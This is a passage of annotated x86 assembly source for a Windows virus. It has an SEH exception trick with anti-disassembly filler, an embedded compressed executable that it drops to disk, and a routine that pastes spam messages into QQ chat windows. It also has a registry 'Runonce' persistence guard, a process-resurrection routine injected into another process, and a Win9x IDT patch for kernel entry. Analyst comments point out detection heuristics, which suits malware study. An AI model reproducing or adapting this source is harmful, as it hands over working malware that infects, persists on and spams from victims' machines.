; GetBit(SrcStr, nCx) — ORs bit number nCx of SrcStr into al.
; Bits are numbered from the most significant bit of byte 0, so the
; shift count is 7 - (nCx mod 8) (computed as (~nCx) & 7).
; In:    SrcStr -> buffer; nCx = bit index; al = accumulator
; Out:   al = al | bit; ecx, edx, esi preserved by the `uses` clause
; Clobb: flags (eax except al untouched)
;-----------------------------------------------------------------------
GetBit proc uses ecx edx esi,SrcStr:DWORD,nCx:DWORD
mov esi,SrcStr
mov ecx,nCx
mov edx,ecx
shr edx,3 ;byte index = bit index / 8
mov dl,[esi+edx] ;dl = that byte
not cl
and cl,07h ;cl = 7 - (bit index mod 8)
shr dl,cl ;move the wanted bit to bit 0
and dl,01h
or al,dl ;accumulate into the caller's al
ret
GetBit endp
;-----------------------------------------------------------------------
; SetSehFrame — installs an SEH frame whose handler is Exception proc and
; records the current esp so ClearSehFrame can unwind to it later.
; In:    ecx = address to resume at when an exception is "ignored";
;        return address on the stack
; Out:   returns to the caller via `jmp eax` with four extra dwords left
;        on the stack, from esp upward: previous saved esp, previous
;        fs:[0], handler address (the `jmp short Exception` stub), ecx.
;        fs:[0] now points at the {prev, handler} pair.
; Clobb: eax, edx; the stack is deliberately left unbalanced until
;        ClearSehFrame runs.
; Note:  the saved esp lives in a dword inside the code stream (see
;        GetSaveEspAddr), so this code must be running from writable
;        memory.
;-----------------------------------------------------------------------
SetSehFrame: ;ecx = address to resume at when an error is ignored
pop eax ;eax = return address
push ecx ;save the resume address on the stack
call PushExceptionProc ;pushes the address of the `jmp short Exception` stub = the SEH handler address
jmp short Exception
db 0e9h ;static-disassembly interference (never executed)
PushExceptionProc:
push fs:dword ptr[0] ;previous EXCEPTION_REGISTRATION pointer
mov fs:[0],esp ;register {prev, handler}
call GetSaveEspAddr ;edx -> in-code esp save slot
push dword ptr[edx] ;keep the previously saved esp (frames can nest)
mov [edx],esp ;record the current esp for ClearSehFrame
jmp eax ;return to the caller
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; ClearSehFrame — undoes SetSehFrame: restores esp to the recorded
; value, re-installs the previous fs:[0], and returns the resume address.
; In:    return address on the stack; the save slot holds the esp that
;        SetSehFrame recorded
; Out:   ecx = resume address that was passed to SetSehFrame; esp back
;        to what it was before SetSehFrame's caller called it
; Clobb: eax, edx
; Pops, in order: previous saved esp -> slot; previous fs:[0];
;        handler stub address (discarded); resume address -> ecx.
;-----------------------------------------------------------------------
ClearSehFrame:
pop eax ;eax = return address
call GetSaveEspAddr ;edx -> in-code esp save slot
mov esp,[edx] ;unwind the stack to the recorded level
pop dword ptr[edx] ;restore the previously saved esp
pop fs:dword ptr[0] ;restore the previous handler chain head
pop ecx ;discard the handler stub address
pop ecx ;ecx = resume address
jmp eax
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; GetSaveEspAddr — returns edx = address of the anonymous `dd ?` slot
; below, which SetSehFrame/ClearSehFrame use to store esp.
; Out:   edx -> save slot
; Analysis note: the slot sits between instructions, so the code page is
; written at run time (no W^X separation) — a useful memory-protection
; heuristic when hunting this loader.
;-----------------------------------------------------------------------
GetSaveEspAddr:
call PushOffsetSaveEspAddr ;call/pop: address of the dword that follows
dd ? ;esp save slot (data inside the code stream)
PushOffsetSaveEspAddr:
pop edx
ret
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; Exception(pRecord, pFrame, pContext, pDispatch) — the SEH handler
; installed by SetSehFrame. Returns 0 (ExceptionContinueExecution) after
; pointing the faulting context's Eip at the `call ClearSehFrame` line
; below; the thread then resumes there, unwinds the frame, and jumps to
; the resume address SetSehFrame was given.
; In:    standard SEH handler arguments; pContext -> CONTEXT
; Out:   eax = 0; on resumption, control ends at `jmp ecx`
; Note:  the handler itself only patches cx_Eip; the real unwind happens
;        after the OS resumes the faulting thread.
;-----------------------------------------------------------------------
Exception proc pRecord,pFrame,pContext,pDispatch
call PushSehBackProc ;pushes the address of the `call ClearSehFrame` line
call ClearSehFrame ;executed on resumption: removes the SEH frame, ecx = resume address
jmp ecx
db 0e9h ;static-disassembly interference (never executed)
PushSehBackProc:
pop ecx ;ecx = address of `call ClearSehFrame`
mov eax,pContext
mov [eax.cx_Eip],ecx ;resume the faulting thread at that address
xor eax,eax ;ExceptionContinueExecution
ret
Exception endp
;-----------------------------------------------------------------------
; UnzipVirusToFile — decodes the run-length-compressed PE image embedded
; below and writes it to an open file handle, one byte per _lwrite call.
; In:    ebx = hFile (opened with _lopen/_lcreat elsewhere);
;        esi = virus data/API table (KnlLWrite)
; Out:   none
; Clobb: eax, ecx, edi
; Encoding (from the decoder): a non-zero byte is written literally; a
;   zero byte is followed by a count N and stands for N zero bytes; a
;   zero followed by a zero count terminates the stream.
; Analysis note: the embedded data decodes to a small PE ("MZ" header,
;   "This program must be run under Win32", sections SCODE/DATA/.idata/
;   .reloc) whose visible import is KERNEL32.dll!Sleep; decoding it
;   offline with the rule above yields the dropped file for hashing.
;-----------------------------------------------------------------------
UnzipVirusToFile: ;ebx=hFile
call GetVirusZipData ;call/pop: address of the compressed image
db 04Dh,05Ah,050h,000h,001h,002h,000h,003h,004h,000h,001h,00Fh,000h,001h,0FFh,0FFh
db 000h,002h,0B8h,000h,007h,040h,000h,001h,01Ah,000h,022h,001h,000h,002h,0BAh,010h
db 000h,001h,00Eh,01Fh,0B4h,009h,0CDh,021h,0B8h,001h,04Ch,0CDh,021h,090h,090h,054h
db 068h,069h,073h,020h,070h,072h,06Fh,067h,072h,061h,06Dh,020h,06Dh,075h,073h,074h
db 020h,062h,065h,020h,072h,075h,06Eh,020h,075h,06Eh,064h,065h,072h,020h,057h,069h
db 06Eh,033h,032h,00Dh,00Ah,024h,037h,000h,088h,050h,045h,000h,002h,04Ch,001h,004h
db 000h,001h,0B5h,02Ch,0EFh,082h,000h,008h,0E0h,000h,001h,08Eh,081h,00Bh,001h,002h
db 019h,000h,001h,002h,000h,003h,006h,000h,007h,010h,000h,003h,010h,000h,003h,020h
db 000h,004h,040h,000h,002h,010h,000h,003h,002h,000h,002h,001h,000h,007h,003h,000h
db 001h,00Ah,000h,006h,050h,000h,003h,004h,000h,006h,002h,000h,005h,010h,000h,002h
db 020h,000h,004h,010h,000h,002h,010h,000h,006h,010h,000h,00Ch,030h,000h,002h,04Eh
db 000h,01Ch,040h,000h,002h,00Ch,000h,053h,043h,04Fh,044h,045h,000h,005h,010h,000h
db 003h,010h,000h,003h,002h,000h,003h,006h,000h,00Eh,020h,000h,002h,060h,044h,041h
db 054h,041h,000h,005h,010h,000h,003h,020h,000h,003h,002h,000h,003h,008h,000h,00Eh
db 040h,000h,002h,0C0h,02Eh,069h,064h,061h,074h,061h,000h,003h,010h,000h,003h,030h
db 000h,003h,002h,000h,003h,00Ah,000h,00Eh,040h,000h,002h,0C0h,02Eh,072h,065h,06Ch
db 06Fh,063h,000h,003h,010h,000h,003h,040h,000h,003h,002h,000h,003h,00Ch,000h,00Eh
db 040h,000h,002h,050h,000h,0FFh,000h,0FFh,000h,0FFh,000h,06Bh,0C3h,0FFh,025h,030h
db 030h,040h,000h,0FFh,000h,0FFh,000h,0FFh,000h,0FDh,028h,030h,000h,00Ah,038h,030h
db 000h,002h,030h,030h,000h,016h,046h,030h,000h,006h,046h,030h,000h,006h,04Bh,045h
db 052h,04Eh,045h,04Ch,033h,032h,02Eh,064h,06Ch,06Ch,000h,004h,053h,06Ch,065h,065h
db 070h,000h,0FFh,000h,0B5h,010h,000h,002h,00Ch,000h,003h,003h,030h,000h,0FFh,000h
db 0FFh,000h,0FFh,000h,0F9h,000h,000h
GetVirusZipData:
pop edi ;edi -> compressed PE data
ContUnZipVirus:
mov al,[edi] ;next encoded byte
inc edi
or al,al
jz short WriteVirusSomeBytes ;zero introduces a run
push eax ;the byte lives on the stack so _lwrite gets a pointer
mov eax,esp
call [esi.KnlLWrite],ebx,eax,01 ;_lwrite(hFile, &byte, 1)
pop eax
jmp short ContUnZipVirus
WriteVirusSomeBytes:
movzx ecx,byte ptr[edi] ;ecx = run length
inc edi
jecxz UnzipVirusEnd ;zero,zero = end of stream
ContWriteVirusBytes:
push ecx
push eax ;al is still 0 here: write one zero byte
mov eax,esp
call [esi.KnlLWrite],ebx,eax,01
pop eax
pop ecx
loop ContWriteVirusBytes
jmp short ContUnZipVirus
UnzipVirusEnd:
ret
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; SendQQMsg(Param) — pastes the eight PushQQMsg strings, one at a time,
; into the edit control of a QQ "发送消息" (send message) window.
; In:    Param unused; the `*9x2k dd ?` slots next to each call hold
;        user32/kernel32 entry points — they are `dd ?`, so they are
;        written by code outside this listing before this runs
;        (presumably the injector), not resolved here.
; Out:   returns after all 8 messages have been placed; esi is used as
;        the message index, so the [esi.*] API table is not available.
; Stack: 100h-byte message buffer; a 1000h-byte scratch area for
;        WM_GETTEXT
; Per message: 12 CR/LF pairs, then the text; FindWindowA(NULL, title)
;   -> GetWindow(hwnd, GW_CHILD) -> WM_GETTEXT (skip if the box already
;   holds text) -> WM_SETTEXT; otherwise Sleep(500) and retry.
; Note:  `call [eax],0` passes only one explicit argument; the string
;   address pushed by `call PushQQWndText` is still on the stack and
;   serves as FindWindowA's second (lpWindowName) argument.
;-----------------------------------------------------------------------
SendQQMsg proc Param: dword
sub esp,100h ;message buffer
xor esi,esi ;esi = message index (0..7)
BuildQQMsg:
mov edi,esp ;edi = buffer cursor
mov ax,0a0dh ;stored little-endian as 0Dh,0Ah = CR LF
mov ecx,12
cld
rep stosw ;12 blank lines before the message
call PushQQMsg ;8 string pointers on the stack, ecx = 32
mov edx,[esp+esi*4] ;edx -> message esi
add esp,ecx ;drop the pointer block
StoreQQMsg:
mov al,[edx]
inc edx
cld
stosb ;copy the message including its NUL
or al,al
jnz short StoreQQMsg
call PushQQWndText ;call/pop: window title string address (left on the stack)
db '发送消息',0
PushQQWndText:
call GetFindWindowA ;call/pop: eax -> FindWindowA slot
FindWindowA9x2k dd ?
GetFindWindowA:
pop eax
call [eax],0 ;FindWindowA(NULL, "发送消息") — second argument is the string pushed above
or eax,eax
jz short WaitForQQWnd ;no QQ send window yet
mov ebx,eax ;ebx = hwnd
call GetGetWindow
GetWindow9x2k dd ?
GetGetWindow:
pop eax
call [eax],ebx,GW_CHILD ;first child control
or eax,eax
jz short WaitForQQWnd
mov ebx,eax ;ebx = child hwnd
call GetSendMessageA
SendMessageA9x2k dd ?
GetSendMessageA:
pop edi ;edi -> SendMessageA slot
sub esp,1000h ;scratch for the current text
call [edi],ebx,WM_GETTEXT,1000h,esp
add esp,1000h
or eax,eax
jnz short WaitForQQWnd ;control already has text: wait instead of overwriting
call [edi],ebx,WM_SETTEXT,1000h,esp ;esp -> prepared message buffer
inc esi
and esi,07h ;wrap after 8 messages
jnz short WaitForQQWnd
add esp,100h ;all messages placed: release the buffer
ret
WaitForQQWnd:
call GetSleep
Sleep9x2k dd ?
GetSleep:
pop eax
call [eax],500 ;Sleep(500 ms)
jmp BuildQQMsg
SendQQMsg endp
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; RegisterProtectProc(hKey) — registry persistence guard (original
; comment: "works on 9x/2k"). Reads the value "Runonce" under hKey once,
; then loops forever: wait for the key to change, rewrite the value.
; In:    hKey = open registry key; the `Adv*9x2k dd ?` slots hold
;        advapi32 entry points written before this code runs
; Out:   never returns
; Stack: 100h-byte copy of the original value data
; Analysis note: a value named "Runonce" being re-created immediately
; after deletion, driven by RegNotifyChangeKeyValue, is the observable
; behaviour to alert on; removal requires stopping this thread first.
;-----------------------------------------------------------------------
RegisterProtectProc proc hKey:dword
mov ebx,hKey ;ebx = hKey
sub esp,100h ;value-data buffer
mov edi,esp ;edi -> buffer
call GetProtectKeyName ;call/pop: value-name string
db 'Runonce',0
GetProtectKeyName:
pop esi ;esi -> "Runonce"
push 100h ;lpcbData in/out = 100h
call GetAdvRegQueryValueExA
AdvRegQueryValueExA9x2k dd ?
GetAdvRegQueryValueExA:
pop eax ;read the original value data into the stack buffer
call [eax],ebx,esi,0,0,edi,esp ;RegQueryValueExA(hKey, "Runonce", 0, 0, buffer, &cbData)
pop eax ;discard cbData
WaitRegChangeNotify:
call GetAdvRegNotifyChangeKeyValue
AdvRegNotifyChangeKeyValue9x2k dd ?
GetAdvRegNotifyChangeKeyValue:
pop eax ;block until the key changes
call [eax],ebx,0,4,0,0 ;RegNotifyChangeKeyValue(hKey, no subtree, filter 4 = last-set change, no event, synchronous)
call GetAdvRegSetValueExA
AdvRegSetValueExA9x2k dd ?
GetAdvRegSetValueExA:
pop eax ;restore the original value
call [eax],ebx,esi,0,1,edi,100h ;RegSetValueExA(hKey, "Runonce", 0, type 1 = REG_SZ, buffer, 100h bytes)
jmp short WaitRegChangeNotify
RegisterProtectProc endp
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; ProcessProtectProc(ProcID) — "resurrection" routine meant to run in
; another process: waits for the virus process to exit, then relaunches
; it from FullPath. ProcessProtectProcSize below measures the routine so
; it can be copied elsewhere; FullPath directly follows it and is
; filled at run time (here it is only a placeholder byte).
; In:    ProcID = PID to watch; the `Knl*9x2k dd ?` slots hold kernel32
;        entry points written before this code runs
; Out:   returns after WinExec, or immediately if OpenProcess fails
; Note:  FullPath's address is computed position-independently with
;        call/pop plus an assembly-time delta, since the copy does not
;        run at its link address.
; Analysis note: a thread in a foreign process that blocks on
; WaitForSingleObject(INFINITE) for another PID and then calls WinExec
; is the detectable pattern here.
;-----------------------------------------------------------------------
ProcessProtectProc proc ProcID:dword
call GetKnlOpenProcess
KnlOpenProcess9x2k dd ?
GetKnlOpenProcess:
pop eax
call [eax],PROCESS_ALL_ACCESS,0,ProcID ;OpenProcess(all access, no inherit, ProcID)
or eax,eax ;NULL handle = could not open the process
jz short ExitProtectProc
mov ebx,eax ;ebx = process handle
call GetKnlWaitForSingleObject
KnlWaitForSingleObject9x2k dd ?
GetKnlWaitForSingleObject:
pop eax ;wait for the process to terminate
call [eax],ebx,-1h ;INFINITE timeout
call GetFileNameAddress ;call/pop: ecx = address of the next label
GetFileNameAddress:
pop ecx
add ecx,offset FullPath-offset GetFileNameAddress ;ecx -> FullPath in the running copy
call GetKnlWinExec
KnlWinExec9x2k dd ?
GetKnlWinExec:
pop eax ;restart the virus process
call [eax],ecx,01 ;WinExec(FullPath, 1 = SW_SHOWNORMAL)
ExitProtectProc:
ret
ProcessProtectProc endp
ProcessProtectProcSize=$-offset ProcessProtectProc ;byte length of the routine, for copying
FullPath db 0e9h ;path buffer placeholder (first byte doubles as disassembly filler); real path written at run time
;-----------------------------------------------------------------------
; MoveDataToKnl(Src, Des, nCx) — copies nCx bytes from Src to Des while
; executing through a temporarily repointed int 3 gate.
; Mechanism visible here: `sidt` reads the IDT base; the int 3 gate
;   (entry 3, 8 bytes) is saved in ebx:edx, its offset fields are
;   overwritten with the address of the `pushad` after `call SetIdt03`,
;   `int 3` then lands there, the gate is restored, the copy is done,
;   and `iret` returns to `sti`. Original comment: "uses the Win9x IDT
;   weakness to enter the kernel" — on Win9x the IDT is writable from
;   user mode; on NT-family systems the writes fault — confirm.
; In:    Src, Des, nCx; interrupts are disabled (cli) across the int 3
; Out:   none; registers preserved (pushad/popad)
; Analysis note: `sidt` followed by writes to the IDT from user-mode
; code is a strong heuristic for this technique.
;-----------------------------------------------------------------------
MoveDataToKnl proc Src:dword,Des:dword,nCx:dword
pushad
push eax ;reserve a dword for sidt's base field
sidt [esp-2] ;6-byte IDTR: limit at esp-2, base dword at esp
pop eax ;eax = IDT base
add eax,3*8 ;eax -> IDT entry 3 (int 3 gate)
mov ebx,[eax] ;save the original gate (low dword)
mov edx,[eax+4] ;save the original gate (high dword)
call SetIdt03 ;pushes the address of the `pushad` below, which becomes the new gate offset
pushad ;entered through the patched gate
mov [eax],ebx ;restore the original gate
mov [eax+4],edx
cld
rep movsb ;copy code/data to the destination (original comment: "into the kernel code area")
popad
iret ;back to the instruction after `int 3`
SetIdt03:
cli
pop word ptr[eax] ;gate offset bits 0..15 = low half of the pushed address
pop word ptr[eax+6] ;gate offset bits 16..31 = high half
mov esi,Src
mov edi,Des
mov ecx,nCx
int 3; ;dispatch through the patched gate (original comment: Win9x IDT weakness)
sti
popad
ret
MoveDataToKnl endp
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; DbgMsg(pMsg) — debugging aid: MessageBoxA(NULL, pMsg, pMsg, 0), using
; the message as both caption and text.
; In:    pMsg -> NUL-terminated string; esi = virus data/API table
; Out:   none; registers preserved (pushad/popad)
;-----------------------------------------------------------------------
DbgMsg proc pMsg:dword
pushad
mov eax,pMsg
call [esi.UserMessageBoxA],0,eax,eax,0 ;MessageBoxA(hwnd 0, text, caption, MB_OK 0)
popad
ret
DbgMsg endp
dd 0,0 ;two zero dwords terminating the body (purpose not visible here — presumably a marker or padding)
VirusEnd: ;end of the static virus body; what follows is generated at run time
;the polymorphic decryption code is placed here (original comment)
ret